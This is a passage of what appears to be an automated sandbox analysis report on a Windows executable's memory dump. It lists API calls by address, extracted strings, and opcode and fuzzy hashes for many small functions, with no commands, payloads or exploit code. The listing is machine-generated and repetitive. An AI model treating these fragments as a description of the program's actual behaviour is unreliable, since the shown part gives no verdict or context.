                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                                                                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                                                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                                                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2903831945-0
                                                                                                                                                                • Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                • Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4247780290-0
                                                                                                                                                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                • memset.MSVCRT ref: 004450CD
                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1471605966-0
                                                                                                                                                                • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                                                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                                                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                • String ID: \StringFileInfo\
                                                                                                                                                                • API String ID: 102104167-2245444037
                                                                                                                                                                • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                                                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                                                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$??3@
                                                                                                                                                                • String ID: g4@
                                                                                                                                                                • API String ID: 3314356048-2133833424
                                                                                                                                                                • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                                                                                • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                                                                                • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MetricsSystem$PlacementWindow
                                                                                                                                                                • String ID: AE
                                                                                                                                                                • API String ID: 3548547718-685266089
                                                                                                                                                                • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                                                                • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                                                                                • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                                                                • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _memicmpwcslen
                                                                                                                                                                • String ID: @@@@$History
                                                                                                                                                                • API String ID: 1872909662-685208920
                                                                                                                                                                • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                                                                • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                                                                • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 004100FB
                                                                                                                                                                • memset.MSVCRT ref: 00410112
                                                                                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                • String ID: </%s>
                                                                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                                                                • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                                                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                                                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040E770
                                                                                                                                                                • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSendmemset
                                                                                                                                                                • String ID: AE$"
                                                                                                                                                                • API String ID: 568519121-1989281832
                                                                                                                                                                • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                                                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                                                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                • String ID: caption
                                                                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                                                                • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                                                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                                                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                • String ID: MS Sans Serif
                                                                                                                                                                • API String ID: 210187428-168460110
                                                                                                                                                                • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                                                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                                                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                • String ID: edit
                                                                                                                                                                • API String ID: 2747424523-2167791130
                                                                                                                                                                • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                                                                • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                                                                • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                • API String ID: 3150196962-1506664499
                                                                                                                                                                • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                                • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                                • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$memcmp
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3384217055-0
                                                                                                                                                                • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 368790112-0
                                                                                                                                                                • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                                                                • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                                                                • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1889144086-0
                                                                                                                                                                • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1661045500-0
